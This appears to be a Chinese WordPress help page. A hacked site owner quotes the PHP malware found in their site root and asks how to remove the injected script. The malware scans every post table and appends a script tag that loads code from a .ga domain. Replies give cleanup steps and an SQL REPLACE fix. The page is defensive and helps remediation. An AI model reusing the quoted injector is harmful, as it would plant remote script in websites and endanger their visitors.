17713433920 info@mac163.com

网站被黑,所有帖子都在内容下注入了一行js代码!

<script src='https://js.xxxxxxx.ga/stat.js?n=ns1' type='text/javascript'></script>

我在根目录中找到了恶意软件文件,该文件通过以下命令注入了JS代码:

$q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%post%'";
$result = $conn->query($q);
if ($result->num_rows > 0) {
    while($row = $result->fetch_assoc()) {
        $q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]."  LIMIT 1 ";
    $result2 = $conn->query($q2);
    if ($result2->num_rows > 0) {
        while($row2 = $result2->fetch_assoc()) {
            $val = $row2['post_content'];
            if(strpos($val, "js.donatelloflowfirstly.ga") === false){
                if(strpos($val, "js.donatelloflowfirstly.ga") === false){
                    
                
                    $q3 = "UPDATE " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." set post_content = CONCAT(post_content,\"<script src='https://js.donatelloflowfirstly.ga/stat.js?n=ns1' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%js.donatelloflowfirstly.ga%'";
                    $conn->query($q3);
                    echo "sql:" . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"];
                
                } else {
                
                }

            } 
        }
    } else {
    }
    }
} else {
}
$conn->close();

有人请使用MYSQL命令帮助我,以便我可以从PHPmyadmin中删除此代码。

如何批量删除所有wordpress帖子的特定部分js内容
如何批量删除所有wordpress帖子的特定部分js内容

建立:

  1. 使用VS Code或类似的支持“在文件中搜索”选项的东西。(不是记事本++)
  2. 下载新的WordPress(您使用的版本)

解答:

  1. 从服务器下载项目的完整备份,并将其放在某个文件夹中(例如project-dev)。
  2. 使用VS Code打开该文件夹。
  3. 单击编辑>在文件中搜索
  4. 搜索“ base64”。确保没有任何编码。如果您发现某些内容,请尝试对其进行解码。有很多在线base64解码器可用。
  5. 检查function.php文件。检查文件的第一行。它应该从评论开始。如果不是,则检查写的内容。如果这类似于
    “ class。[sometext]”或“ dir / password”或“ id / password”,然后在if语句中添加一些哈希,则将其删除,直到正确的注释行。(大多数主题从评论开始)
  6. 确保主题中的所有文件都是必需的。而且您没有其他类似的代码。
  7. 在大多数情况下,它驻留在2到3个地方。
  8. 现在复制文件夹“ project-dev / your-project / wp-content / themes / theme-name”。
  9. 将您之前下载的新WordPress提取到另一个目录中。
  10. 将复制的主题文件夹粘贴到新的WordPress中。
  11. 复制整个内容并将其上传回服务器并更改wp-config文件。
  12. 还要清除我前面提到的数据库。

我刚刚用js代码中的“”编辑了您的命令,它可以正常工作!

UPDATE wp_posts SET post_content = REPLACE (post_content, "<script src='https://js.xxxxxxx.ga/stat.js?n=ns1' type='text/javascript'></script>", '');

我使用付费主题,一些付费插件,但2个空插件,太可惜了!现在寻找一些工具来检查代码!希望可以找出后门…


微信二维码

微信扫描二维码联系我们!
我们在微信上24小时期待你的声音
提供外贸路由器设备产品,轻松翻墙,解答:WP主题推荐,WP网站建设,Google SEO,百度SEO,专业服务器环境搭建等!


需要提供WordPress主题/插件的汉化服务可以随时联系我们!另外成品WordPress网站以及半成品WordPress网站建设,海外Google SEO优化托管服务,百度SEO优化托管服务,Centos/Debian服务器WP专用环境搭建,WP缓存服务器搭建,我们都是你的首选,拥有多年WP开源程序服务经验,我们一直在坚持客户体验,没有最好,只有更好!
回到顶部